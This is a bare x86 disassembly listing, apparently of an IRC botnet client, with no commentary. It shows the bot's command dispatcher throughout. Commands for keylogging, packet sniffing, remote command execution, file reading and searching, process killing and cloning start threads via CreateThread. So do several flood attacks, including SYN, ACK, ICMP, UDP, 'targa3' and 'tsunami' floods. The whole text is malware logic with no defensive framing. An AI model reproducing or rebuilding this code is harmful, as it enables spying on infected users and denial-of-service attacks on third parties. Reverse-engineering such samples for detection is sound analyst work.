call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_4062C4
mov edi, offset dword_4D46EC
loc_405796: ; CODE XREF: sub_401ACD+3CE8�j
cmp dword ptr [edi-4], 1
jnz short loc_4057A9
mov eax, [edi]
cmp eax, ebx
jbe short loc_4057A9
push eax
call ds:dword_4CB6EC ; closesocket
loc_4057A9: ; CODE XREF: sub_401ACD+3CCD�j
; sub_401ACD+3CD3�j
add edi, 210h
cmp edi, offset dword_4DAE0C
jl short loc_405796
cmp [ebp+var_8], ebx
jnz loc_4062C4
push ebx
push [ebp+var_4]
push offset unk_42BA4C
push [ebp+var_88]
push [ebp+arg_4]
call sub_409A73
add esp, 14h
jmp loc_4062C4
; ---------------------------------------------------------------------------
loc_4057DF: ; CODE XREF: sub_401ACD+3196�j
mov edi, [ebp+arg_8]
push edi
push offset aNick_0 ; "nick"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_409759
push edi
push offset aN ; "n"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_409759
push edi
push offset aJoin ; "join"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_409732
push edi
push offset aJ ; "j"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_409732
push edi
push offset aPart_0 ; "part"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_409712
push edi
push offset aPt ; "pt"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_409712
push edi
push offset aRaw ; "raw"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4096D6
push edi
push offset aR ; "r"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4096D6
push edi
push offset aKillthread ; "killthread"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4095D6
push edi
push offset aK ; "k"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4095D6
push edi
push offset aC_quit ; "c_quit"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_409528
push edi
push offset aC_q ; "c_q"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_409528
push edi
push offset aC_rndnick ; "c_rndnick"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4094D6
push edi
push offset aC_rn ; "c_rn"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4094D6
push edi
push offset aPrefix ; "prefix"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4094BD
push edi
push offset aPr ; "pr"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4094BD
push edi
push offset aOpen ; "open"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_40948F
push edi
push offset aO ; "o"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_40948F
push edi
push offset aServer ; "server"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_409472
push edi
push offset aSe ; "se"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_409472
push edi
push offset aDns ; "dns"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_409407
push edi
push offset aDn ; "dn"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_409407
push edi
push offset aKillproc ; "killproc"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4093D7
push edi
push offset aKp ; "kp"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4093D7
push edi
push offset aKill ; "kill"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_409378
push edi
push offset aKi ; "ki"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_409378
push edi
push offset aDelete ; "delete"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_40933C
push edi
push offset aDel ; "del"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_40933C
push edi
push offset aGet ; "get"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_40925D
push edi
push offset aGt ; "gt"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_40925D
push edi
push offset aList ; "list"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_40923B
push edi
push offset aLi ; "li"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_40923B
push edi
push offset aVisit ; "visit"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_409147
push edi
push offset aV ; "v"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_409147
push edi
push offset aMirccmd ; "mirccmd"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_409110
push edi
push offset aMirc ; "mirc"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_409110
push edi
push offset aCmd ; "cmd"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4090A6
push edi
push offset aCm ; "cm"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4090A6
push edi
push offset aReadfile ; "readfile"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_409029
push edi
push offset aRf ; "rf"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_409029
push edi
push offset aPsniff ; "psniff"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_405C7C
push [ebp+arg_10]
push offset aOn ; "on"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_405C42
push 20h
call sub_40B33F
test eax, eax
pop ecx
jle short loc_405B6C
push offset dword_42B950
jmp loc_406F05
; ---------------------------------------------------------------------------
loc_405B6C: ; CODE XREF: sub_401ACD+4093�j
mov eax, [ebp+arg_4]
mov esi, [ebp+esi+var_88]
mov [ebp+var_EC4], eax
mov eax, [ebp+var_4]
mov [ebp+var_E3C], eax
mov eax, [ebp+var_8]
cmp esi, ebx
mov [ebp+var_E38], eax
jnz short loc_405BAE
mov esi, offset aF_1 ; "#f"
push offset byte_43D808
push esi
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_405BAE
mov esi, [ebp+var_88]
loc_405BAE: ; CODE XREF: sub_401ACD+40C3�j
; sub_401ACD+40D9�j
push esi
lea eax, [ebp+var_EC0]
push 80h
push eax
call sub_41B980
add esp, 0Ch
lea eax, [ebp+var_2C4]
push offset dword_42B920
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2C4]
push 20h
push eax
call sub_40B0F7
add esp, 14h
mov [ebp+var_E40], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_EC4]
push ebx
push eax
push offset sub_411FD6
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, [ebp+var_E40]
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_405C31
loc_405C1B: ; CODE XREF: sub_401ACD+4162�j
cmp [ebp+var_E34], ebx
jnz loc_40828C
push 32h
call dword_427078 ; Sleep
jmp short loc_405C1B
; ---------------------------------------------------------------------------
loc_405C31: ; CODE XREF: sub_401ACD+414C�j
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset dword_42B8E4
jmp loc_4049EC
; ---------------------------------------------------------------------------
loc_405C42: ; CODE XREF: sub_401ACD+4083�j
push [ebp+arg_10]
push offset aOff ; "off"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_40828C
push ebx
push 20h
call sub_40B2F2
pop ecx
cmp eax, ebx
pop ecx
jle short loc_405C72
push eax
push offset dword_42B8A8
jmp loc_4049EC
; ---------------------------------------------------------------------------
loc_405C72: ; CODE XREF: sub_401ACD+4198�j
push offset dword_42B87C
jmp loc_406F05
; ---------------------------------------------------------------------------
loc_405C7C: ; CODE XREF: sub_401ACD+406C�j
push edi
push offset aSniffer ; "sniffer"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_405DCE
push [ebp+arg_10]
push offset aOn ; "on"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_405D94
push 21h
call sub_40B33F
test eax, eax
pop ecx
jle short loc_405CBE
push offset unk_42B854
jmp loc_406F05
; ---------------------------------------------------------------------------
loc_405CBE: ; CODE XREF: sub_401ACD+41E5�j
mov eax, [ebp+arg_4]
mov esi, [ebp+esi+var_88]
mov [ebp+var_FEC], eax
mov eax, [ebp+var_4]
mov [ebp+var_F64], eax
mov eax, [ebp+var_8]
cmp esi, ebx
mov [ebp+var_F60], eax
jnz short loc_405D00
mov esi, offset aF_1 ; "#f"
push offset byte_43D808
push esi
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_405D00
mov esi, [ebp+var_88]
loc_405D00: ; CODE XREF: sub_401ACD+4215�j
; sub_401ACD+422B�j
push esi
lea eax, [ebp+var_FE8]
push 80h
push eax
call sub_41B980
add esp, 0Ch
lea eax, [ebp+var_2C4]
push offset unk_42B824
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2C4]
push 21h
push eax
call sub_40B0F7
add esp, 14h
mov [ebp+var_F68], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_FEC]
push ebx
push eax
push offset sub_412661
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, [ebp+var_F68]
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_405D83
loc_405D6D: ; CODE XREF: sub_401ACD+42B4�j
cmp [ebp+var_F5C], ebx
jnz loc_40828C
push 32h
call dword_427078 ; Sleep
jmp short loc_405D6D
; ---------------------------------------------------------------------------
loc_405D83: ; CODE XREF: sub_401ACD+429E�j
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset unk_42B7E8
jmp loc_4049EC
; ---------------------------------------------------------------------------
loc_405D94: ; CODE XREF: sub_401ACD+41D5�j
push [ebp+arg_10]
push offset aOff ; "off"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_40828C
push ebx
push 21h
call sub_40B2F2
pop ecx
cmp eax, ebx
pop ecx
jle short loc_405DC4
push eax
push offset unk_42B7A8
jmp loc_4049EC
; ---------------------------------------------------------------------------
loc_405DC4: ; CODE XREF: sub_401ACD+42EA�j
push offset unk_42B778
jmp loc_406F05
; ---------------------------------------------------------------------------
loc_405DCE: ; CODE XREF: sub_401ACD+41BE�j
push edi
push offset aIdent ; "ident"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_405EA3
push [ebp+arg_10]
push offset aOn ; "on"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_405E69
push 2
call sub_40B33F
test eax, eax
pop ecx
jle short loc_405E0C
push offset dword_42B750
jmp loc_406F05
; ---------------------------------------------------------------------------
loc_405E0C: ; CODE XREF: sub_401ACD+4333�j
lea eax, [ebp+var_2C4]
push offset dword_42B724
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2C4]
push 2
push eax
call sub_40B0F7
add esp, 14h
mov esi, eax
lea eax, [ebp+var_10]
push eax
push ebx
push esi
push offset sub_4101FD
push ebx
push ebx
call dword_42707C ; CreateThread
imul esi, 234h
cmp eax, ebx
mov dword_43E5A4[esi], eax
jnz loc_40828C
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset dword_42B6F0
jmp loc_4049EC
; ---------------------------------------------------------------------------
loc_405E69: ; CODE XREF: sub_401ACD+4327�j
push [ebp+arg_10]
push offset aOff ; "off"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_40828C
push ebx
push 2
call sub_40B2F2
pop ecx
cmp eax, ebx
pop ecx
jle short loc_405E99
push eax
push offset dword_42B6B8
jmp loc_4049EC
; ---------------------------------------------------------------------------
loc_405E99: ; CODE XREF: sub_401ACD+43BF�j
push offset dword_42B698
jmp loc_406F05
; ---------------------------------------------------------------------------
loc_405EA3: ; CODE XREF: sub_401ACD+4310�j
push edi
push offset aKeylog ; "keylog"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_406020
push [ebp+arg_10]
push offset aOn ; "on"
call sub_41C070
pop ecx
mov edi, offset aFile ; "file"
test eax, eax
pop ecx
jz short loc_405F19
push [ebp+arg_10]
push edi
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz short loc_405F19
push [ebp+arg_10]
push offset aOff ; "off"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_40828C
push ebx
push 23h
call sub_40B2F2
pop ecx
cmp eax, ebx
pop ecx
jle short loc_405F0F
push eax
push offset dword_42B64C
jmp loc_4049EC
; ---------------------------------------------------------------------------
loc_405F0F: ; CODE XREF: sub_401ACD+4435�j
push offset dword_42B620
jmp loc_406F05
; ---------------------------------------------------------------------------
loc_405F19: ; CODE XREF: sub_401ACD+4401�j
; sub_401ACD+4410�j
push 23h
call sub_40B33F
test eax, eax
pop ecx
jle short loc_405F2F
push offset dword_42B600
jmp loc_406F05
; ---------------------------------------------------------------------------
loc_405F2F: ; CODE XREF: sub_401ACD+4456�j
mov eax, [ebp+arg_4]
push [ebp+arg_10]
mov [ebp+var_C5C], eax
mov eax, [ebp+var_4]
push edi
mov [ebp+var_BD4], eax
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_405F5C
mov [ebp+var_BD0], 1
jmp short loc_405F65
; ---------------------------------------------------------------------------
loc_405F5C: ; CODE XREF: sub_401ACD+4481�j
mov eax, [ebp+var_8]
mov [ebp+var_BD0], eax
loc_405F65: ; CODE XREF: sub_401ACD+448D�j
mov esi, [ebp+esi+var_88]
cmp esi, ebx
jnz short loc_405F8C
mov esi, offset aF_0 ; "#f"
push offset byte_43D808
push esi
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_405F8C
mov esi, [ebp+var_88]
loc_405F8C: ; CODE XREF: sub_401ACD+44A1�j
; sub_401ACD+44B7�j
push esi
lea eax, [ebp+var_C54]
push 80h
push eax
call sub_41B980
add esp, 0Ch
lea eax, [ebp+var_2C4]
push offset dword_42B5DC
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2C4]
push 23h
push eax
call sub_40B0F7
add esp, 14h
mov [ebp+var_C58], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_C5C]
push ebx
push eax
push offset sub_411CF5
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, [ebp+var_C58]
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_40600F
loc_405FF9: ; CODE XREF: sub_401ACD+4540�j
cmp [ebp+var_BCC], ebx
jnz loc_40828C
push 32h
call dword_427078 ; Sleep
jmp short loc_405FF9
; ---------------------------------------------------------------------------
loc_40600F: ; CODE XREF: sub_401ACD+452A�j
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset dword_42B5A0
jmp loc_4049EC
; ---------------------------------------------------------------------------
loc_406020: ; CODE XREF: sub_401ACD+43E5�j
push edi
push offset aNet ; "net"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_406270
cmp ds:dword_4CB724, ebx
jz short loc_40604F
cmp ds:dword_4CB74C, ebx
jz short loc_40604F
push offset unk_42B564
jmp loc_4085D6
; ---------------------------------------------------------------------------
loc_40604F: ; CODE XREF: sub_401ACD+456E�j
; sub_401ACD+4576�j
cmp [ebp+var_C], ebx
jz loc_406CDF
mov edi, [ebp+esi+var_88]
mov [ebp+arg_0], ebx
cmp edi, ebx
jz short loc_406074
push edi
push [ebp+var_C]
call sub_41B900
pop ecx
mov [ebp+arg_0], eax
pop ecx
loc_406074: ; CODE XREF: sub_401ACD+4597�j
push [ebp+arg_10]
push offset aStart ; "start"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_4060C1
cmp edi, ebx
jz short loc_406095
push [ebp+arg_0]
push 3
jmp loc_406127
; ---------------------------------------------------------------------------
loc_406095: ; CODE XREF: sub_401ACD+45BC�j
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_41895C
add esp, 0Ch
test eax, eax
jz short loc_4060B7
push offset unk_42B538
jmp loc_4085D6
; ---------------------------------------------------------------------------
loc_4060B7: ; CODE XREF: sub_401ACD+45DE�j
push offset unk_42B518
jmp loc_4085D6
; ---------------------------------------------------------------------------
loc_4060C1: ; CODE XREF: sub_401ACD+45B8�j
push [ebp+arg_10]
push offset aStop ; "stop"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_4060DB
push [ebp+arg_0]
push 4
jmp short loc_406127
; ---------------------------------------------------------------------------
loc_4060DB: ; CODE XREF: sub_401ACD+4605�j
push [ebp+arg_10]
push offset aPause ; "pause"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_4060F5
push [ebp+arg_0]
push 5
jmp short loc_406127
; ---------------------------------------------------------------------------
loc_4060F5: ; CODE XREF: sub_401ACD+461F�j
push [ebp+arg_10]
push offset aContinue ; "continue"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_40610F
push [ebp+arg_0]
push 6
jmp short loc_406127
; ---------------------------------------------------------------------------
loc_40610F: ; CODE XREF: sub_401ACD+4639�j
push [ebp+arg_10]
push offset aDelete ; "delete"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_406139
push [ebp+arg_0]
push 1
loc_406127: ; CODE XREF: sub_401ACD+45C3�j
; sub_401ACD+460C�j ...
call sub_4186C2
pop ecx
pop ecx
loc_40612E: ; CODE XREF: sub_401ACD+46A2�j
; sub_401ACD+472A�j ...
push eax
push offset aS_2 ; "%s"
jmp loc_406CD0
; ---------------------------------------------------------------------------
loc_406139: ; CODE XREF: sub_401ACD+4653�j
push [ebp+arg_10]
push offset aShare ; "share"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_40619E
cmp edi, ebx
jz short loc_406171
cmp [ebp+var_8FC], bl
jz short loc_40615E
push ebx
push edi
push 1
jmp short loc_406167
; ---------------------------------------------------------------------------
loc_40615E: ; CODE XREF: sub_401ACD+4689�j
push [ebp+esi+var_84]
push edi
push ebx
loc_406167: ; CODE XREF: sub_401ACD+468F�j
call sub_418A99
add esp, 0Ch
jmp short loc_40612E
; ---------------------------------------------------------------------------
loc_406171: ; CODE XREF: sub_401ACD+4681�j
push ebx
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_418C8F
add esp, 10h
test eax, eax
jz short loc_406194
push offset unk_42B4D0
jmp loc_4085D6
; ---------------------------------------------------------------------------
loc_406194: ; CODE XREF: sub_401ACD+46BB�j
push offset unk_42B4B0
jmp loc_4085D6
; ---------------------------------------------------------------------------
loc_40619E: ; CODE XREF: sub_401ACD+467D�j
push [ebp+arg_10]
push offset aUser ; "user"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_406229
cmp edi, ebx
jz short loc_4061FC
cmp [ebp+var_8FC], bl
jz short loc_4061CF
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
push ebx
push edi
push 1
jmp short loc_4061EF
; ---------------------------------------------------------------------------
loc_4061CF: ; CODE XREF: sub_401ACD+46EE�j
push [ebp+var_4]
mov esi, [ebp+esi+var_84]
cmp esi, ebx
push [ebp+var_88]
push [ebp+arg_4]
jz short loc_4061EB
push esi
push edi
push ebx
jmp short loc_4061EF
; ---------------------------------------------------------------------------
loc_4061EB: ; CODE XREF: sub_401ACD+4717�j
push ebx
push edi
push 2
loc_4061EF: ; CODE XREF: sub_401ACD+4700�j
; sub_401ACD+471C�j
call sub_418DB0
add esp, 18h
jmp loc_40612E
; ---------------------------------------------------------------------------
loc_4061FC: ; CODE XREF: sub_401ACD+46E6�j
push ebx
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_4192E0
add esp, 10h
test eax, eax
jz short loc_40621F
push offset unk_42B490
jmp loc_4085D6
; ---------------------------------------------------------------------------
loc_40621F: ; CODE XREF: sub_401ACD+4746�j
push offset unk_42B470
jmp loc_4085D6
; ---------------------------------------------------------------------------
loc_406229: ; CODE XREF: sub_401ACD+46E2�j
push [ebp+arg_10]
push offset aSend ; "send"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_406266
cmp edi, ebx
jz short loc_40625C
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_419594
add esp, 10h
jmp loc_40612E
; ---------------------------------------------------------------------------
loc_40625C: ; CODE XREF: sub_401ACD+4771�j
push offset unk_42B444
jmp loc_4085D6
; ---------------------------------------------------------------------------
loc_406266: ; CODE XREF: sub_401ACD+476D�j
push offset unk_42B428
jmp loc_4085D6
; ---------------------------------------------------------------------------
loc_406270: ; CODE XREF: sub_401ACD+4562�j
push edi
push offset aCapture ; "capture"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_408DFE
push edi
push offset aCap ; "cap"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_408DFE
push edi
push offset aGethost ; "gethost"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_408D0A
push edi
push offset aGh ; "gh"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_408D0A
loc_4062C4: ; CODE XREF: sub_401ACD+3CBE�j
; sub_401ACD+3CED�j ...
mov edi, [ebp+esi+var_88]
cmp edi, ebx
mov [ebp+arg_1C], edi
jz loc_401E94
push [ebp+arg_8]
push offset aKilllog ; "killlog"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_408CF0
push [ebp+arg_8]
push offset aKl ; "kl"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_408CF0
push [ebp+arg_8]
push offset aAddalias ; "addalias"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_408CAD
push [ebp+arg_8]
push offset aAa ; "aa"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_408CAD
push [ebp+arg_8]
push offset aPrivmsg_0 ; "privmsg"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_408C58
push [ebp+arg_8]
push offset dword_42BC00
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_408C58
push [ebp+arg_8]
push offset aAction ; "action"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_408BEB
push [ebp+arg_8]
push offset aA ; "a"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_408BEB
push [ebp+arg_8]
push offset aCycle ; "cycle"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_408B87
push [ebp+arg_8]
push offset aCy ; "cy"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_408B87
push [ebp+arg_8]
push offset aMode ; "mode"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_408B4B
push [ebp+arg_8]
push offset aM ; "m"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_408B4B
push [ebp+arg_8]
push offset aC_raw ; "c_raw"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_408ADC
push [ebp+arg_8]
push offset aC_r ; "c_r"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_408ADC
push [ebp+arg_8]
push offset aC_mode ; "c_mode"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_408A56
push [ebp+arg_8]
push offset aC_m ; "c_m"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_408A56
push [ebp+arg_8]
push offset aC_nick ; "c_nick"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4089E6
push [ebp+arg_8]
push offset aC_n ; "c_n"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4089E6
push [ebp+arg_8]
push offset aC_join ; "c_join"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4089C0
push [ebp+arg_8]
push offset aC_j ; "c_j"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4089C0
push [ebp+arg_8]
push offset aC_part ; "c_part"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_40895C
push [ebp+arg_8]
push offset aC_p ; "c_p"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_40895C
push [ebp+arg_8]
push offset aTarga3 ; "targa3"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_408887
push [ebp+arg_8]
push offset aT3 ; "t3"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_408887
push [ebp+arg_8]
push offset aTsunami ; "tsunami"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_40878C
push [ebp+arg_8]
push offset aTsn ; "tsn"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_40878C
push [ebp+arg_8]
push offset aRepeat ; "repeat"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_408688
push [ebp+arg_8]
push offset aRp ; "rp"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_408688
push [ebp+arg_8]
push offset aDelay ; "delay"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4085E9
push [ebp+arg_8]
push offset aDe ; "de"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4085E9
push [ebp+arg_8]
push offset aJpDe10 ; "jp]de10"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_408458
push [ebp+arg_8]
push offset aJp10 ; "jp]10"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_408458
push [ebp+arg_8]
push offset aExecute ; "execute"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4083C5
push [ebp+arg_8]
push offset aE ; "e"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4083C5
push [ebp+arg_8]
push offset aFindfile ; "findfile"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4082B6
push [ebp+arg_8]
push offset aFf ; "ff"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4082B6
push [ebp+arg_8]
push offset aRename ; "rename"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_40823F
push [ebp+arg_8]
push offset aMv ; "mv"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_40823F
push [ebp+arg_8]
push offset aIcmpflood ; "icmpflood"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_408142
push [ebp+arg_8]
push offset aIcmp ; "icmp"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_408142
mov eax, [ebp+esi+var_84]
cmp eax, ebx
mov [ebp+arg_0], eax
jz loc_401E94
push [ebp+arg_8]
push offset aClone_0 ; "clone"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_40805A
push [ebp+arg_8]
push offset aC ; "c"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_40805A
push [ebp+arg_8]
push offset aDdos_syn ; "ddos.syn"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_407F61
push [ebp+arg_8]
push offset aDdos_ack ; "ddos.ack"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_407F61
push [ebp+arg_8]
push offset aDdos_random ; "ddos.random"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_407F61
push [ebp+arg_8]
push offset aWisdom_udp ; "wisdom.udp"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_4067D7
push 7Fh
lea eax, [ebp+var_327C]
pop esi
push esi
push [ebp+arg_10]
push eax
call sub_41B5F0
push esi
lea eax, [ebp+var_31FC]
push edi
push eax
call sub_41B5F0
push esi
lea eax, [ebp+var_317C]
push [ebp+arg_0]
push eax
call sub_41B5F0
push esi
lea eax, [ebp+var_30FC]
push [ebp+var_88]
push eax
call sub_41B5F0
mov eax, [ebp+var_8]
mov edi, [ebp+var_4]
mov esi, [ebp+arg_4]
mov [ebp+var_3074], eax
push ebx
lea eax, [ebp+var_2C4]
push 13h
push eax
mov [ebp+var_3078], edi
mov [ebp+var_3280], esi
call sub_40B0F7
add esp, 3Ch
mov [ebp+var_307C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_3280]
push ebx
push eax
push offset sub_4146CF
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, [ebp+var_307C]
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_4067C6
loc_4067B0: ; CODE XREF: sub_401ACD+4CF7�j
cmp [ebp+var_3070], ebx
jnz loc_403DA1
push 32h
call dword_427078 ; Sleep
jmp short loc_4067B0
; ---------------------------------------------------------------------------
loc_4067C6: ; CODE XREF: sub_401ACD+4CE1�j
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset unk_42B29C
jmp loc_403D92
; ---------------------------------------------------------------------------
loc_4067D7: ; CODE XREF: sub_401ACD+4C37�j
push [ebp+arg_8]
push offset aSynflood ; "synflood"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_407E79
push [ebp+arg_8]
push offset aSyn ; "syn"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_407E79
push [ebp+arg_8]
push offset aSkysyn ; "skysyn"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_406904
push 7Fh
lea eax, [ebp+var_36A4]
pop esi
push esi
push [ebp+arg_10]
push eax
call sub_41B5F0
push esi
lea eax, [ebp+var_3624]
push edi
push eax
call sub_41B5F0
push esi
lea eax, [ebp+var_35A4]
push [ebp+arg_0]
push eax
call sub_41B5F0
push esi
lea eax, [ebp+var_3524]
push [ebp+var_88]
push eax
call sub_41B5F0
mov eax, [ebp+var_4]
add esp, 30h
mov esi, [ebp+arg_4]
mov [ebp+var_34A0], eax
push [ebp+arg_0]
mov eax, [ebp+var_8]
mov [ebp+var_349C], eax
lea eax, [ebp+var_2C4]
push edi
mov [ebp+var_36A8], esi
push [ebp+arg_10]
push offset dword_42B254
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2C4]
push 10h
push eax
call sub_40B0F7
add esp, 20h
mov [ebp+var_34A4], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_36A8]
push ebx
push eax
push offset sub_413627
push ebx
push ebx
call dword_42707C ; CreateThread
